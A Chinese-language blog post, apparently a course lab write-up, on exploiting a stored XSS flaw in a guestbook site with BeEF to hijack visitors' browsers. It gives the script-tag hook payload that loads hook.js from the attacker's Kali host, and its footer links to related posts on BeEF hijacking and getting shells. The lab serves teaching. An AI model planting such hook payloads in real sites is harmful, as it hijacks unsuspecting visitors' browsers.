XSS部分:利用Beef劫持被攻击者客户端浏览器

最新推荐文章于 2024-06-03 08:26:45 发布
最新推荐文章于 2024-06-03 08:26:45 发布
阅读量190 收藏
点赞数
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AZXYZNPY/article/details/127961989
版权

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

  1. 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 

  1. Kali使用beef生成恶意代码,截图。

 

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

 

  1. 管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

 

5、回答问题:实验中XSS攻击属于哪种类型?

本实验中的XSS攻击类型属于注入型XSS

原理:此类XSS漏洞是指,用户输入的数据(恶意代码)可以“存储”在服务端,只要有人访问这个包含有存储型XSS代码的页面,XSS脚本就会在他们的浏览器中执行,这种XSS具有很强的稳定性。

阿卓要赚大钱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
内网渗透小计之从劫持浏览器客户端到渗透Linux系统全过程
weixin_34218582的博客
01-31 871
本机是Ubuntu系统 所以我们直接本机实战好了 大晚上的 睡不着 写篇文章在睡 先来讲一下劫持浏览器 劫持浏览器用到的工具为beef-xss 在Ubuntu中 如果你想安装的话 直接吧kali源添加进去后 apt-get install beef-xss //安装 打开的话 直接beef-xss 如下图 root@xaiSec:/home/hacker# beef-xss Pleas...
beef-xss浏览器劫持
weixin_43225966的博客
04-19 742
beef-xss浏览器劫持复现
利用beef劫持客户端浏览器
qq_42853814的博客
01-28 324
Current Browser选择Commands,然后在Browser里面选择Redirect Browser,最后在右边的Redirect URL中输入网址,就可以控制目标浏览器跳转到指定网址了。1.搭建IIS服务器,配置存在XSS漏洞的留言板网站,并利用AWVS(Acunetix Web Vulnerability Scanner 10.0)扫描出该网站存在XSS漏洞。4. 在本机访问这个服务器的留言板,本机的浏览器就会被劫持,接着就可以利用beef控制浏览器跳转到指定网址。3. 客户端(本机)
利用Beef劫持攻击者客户端浏览器。用DVWA+SQLmap+Mysql进行SQL注入实战。
yellowO的博客
12-24 1855
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;SqlMAP;DVWA实验环境搭建。角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
利用Beef劫持客户端浏览器
weixin_45329009的博客
10-28 1239
利用Beef劫持客户端浏览器 一、环境: 1.Kali(使用beef生成恶意代码,IP:192.168.0.103) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.0.104) 3. 客户端(用于访问web服务器,IP:192.168.0.101) 二、步骤: Kali使用beef生成恶意代码 将恶意代码写入192.168.0.104网站留言板 只要客户端访问这个服务...
XSS漏洞07】基于神器beEFXSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
Fighting_hawk的博客
02-26 4597
1. 加深理解XSS漏洞的利用和危害; 2. 了解beEF工具的使用; 3. 掌握浏览器劫持的攻击方法; 4. 掌握会话劫持的攻击方法; 5. 掌握通过XSS漏洞GetShell的方法。
存储型XSSBEEF浏览器攻击框架
分享学习网络的点点滴滴
08-24 356
里面有很多,比如获取cookie,获取超链接啊,修改超链接啊,开启摄像头啊,攻击啊,dos,交换机路由器漏洞利用啊等等,自己使用dvwa用kali试试吧;方法还是跟反射型方法一样,只不过对于存储XSS是存入数据库的,只要打开页面就会执行。客户端:运行于客户端浏览器的Javascript脚本(hook)红色模块:表示模块不适用于当前用户,有些红色模块也可被正常执行。绿色模块:表示模块适合目标浏览器,并且执行结果被客户端不可见。橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)
beef-xss
一纸荒芜的博客
09-07 1204
xss漏洞可以拿来做什么呢?只是弹窗吗?不,我们的目的是盗取用户cookie,配合工具还可查看文件管理,本期主要介绍了beef-xss的简单用法。
前端安全系列:如何防止XSS攻击?
01-27
XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜
xss防御之php利用httponly防xss攻击
10-26
主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
vuejs-serverside-template-xss:混合了导致XSS漏洞的客户端模板和服务器端模板的Vue.js应用程序的演示
02-06
Vue.js服务器端模板XSS示例该存储库演示了同时使用服务器端渲染和Vue.js的Web应用程序如何能够容易受到XSS的攻击,即使它们采取了预防措施。 index.php是一个易受攻击PHP脚本。 fix-v-pre.php和fix-servervars-...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
xss漏洞以及beef的使用
young‘s blog
07-20 3035
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
XSS攻击:利用Beef劫持攻击者客户端浏览器
zzzfff__的博客
11-13 1188
实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器劫持
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1007
0x0环境 主机A win10:10.51.20.60(wifi) 主机A中的虚拟机kali(攻击者):192.168.110.129(NAT) 主机A中的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外网的电脑IP) public_port:主机A中空闲的端口,我
谷歌Cloud、Paly 中的XSS 漏洞可导致账户劫持
smellycat000的专栏
08-01 367
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Google Cloud、DevSite 和 Google Play 中存在几个漏洞,可导致攻击者实施跨站点脚本攻击,导致账户遭劫持。第一个漏洞是位于 Google DevSite 中的一个反射性 XSS。受攻击者控制的链接可在http://cloud.google.com 和 http://developers.goo...
HTTP only下XSS劫持登录表单到内网沦陷
weixin_40418457的博客
05-09 239
virtual host discover发现多处内网系统,但大多数系统都接入了统一认证。 在某些系统以及他的一些接口中我可以未授权访问,收集到大量的员工信息包括email,姓名等。 在测试完接口未授权之类的漏洞我尝试去找一些不一样的东西绕过uuap。 闲逛了一段时间后在一个子系统登录点我发现了一个可疑的点,uri里面的errorMessage内容出现在了页面上,于是顺手一测一个反射型xss到手。 但可惜的是此处Cookie有HTTP only,打cookie绕uuap看来是没希望。想两两相忘于江湖却有
JS加密解密/XSS的防御
最新发布
mxd01848的博客
06-03 498
总之,防御 XSS 攻击需要从多个角度进行考虑和处理,包括输入过滤、输出编码以及使用可靠的安全库和框架。通过多层次的防御策略,可以有效地提高应用程序的安全性。这段代码的目的是对用户输入进行过滤,以防止跨站脚本(XSS)攻击。让我们详细拆解这段代码,并分析其工作原理和有效性。怎么隐藏你的xss保护逻辑呢,使用在线js加解密工具对代码进行保护。是一个用于过滤 XSS 攻击的函数。函数进行过滤,然后返回过滤后的结果。进行解码,并将其传递给。最终返回过滤后的字符串。,表示需要过滤的输入。,则不进行后续操作。
启动BeEF。在攻击机启动BeEF。命令如下: #beef-xss
06-11
2. 输入命令:beef-xss 3. 回车键运行命令 4. 等待BeEF启动完毕,此时终端会输出BeEF的Web界面URL地址 5. 打开浏览器,输入BeEF的Web界面URL地址,进入BeEF的管理界面 请注意,BeEF是一款强大的工具,使用时需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值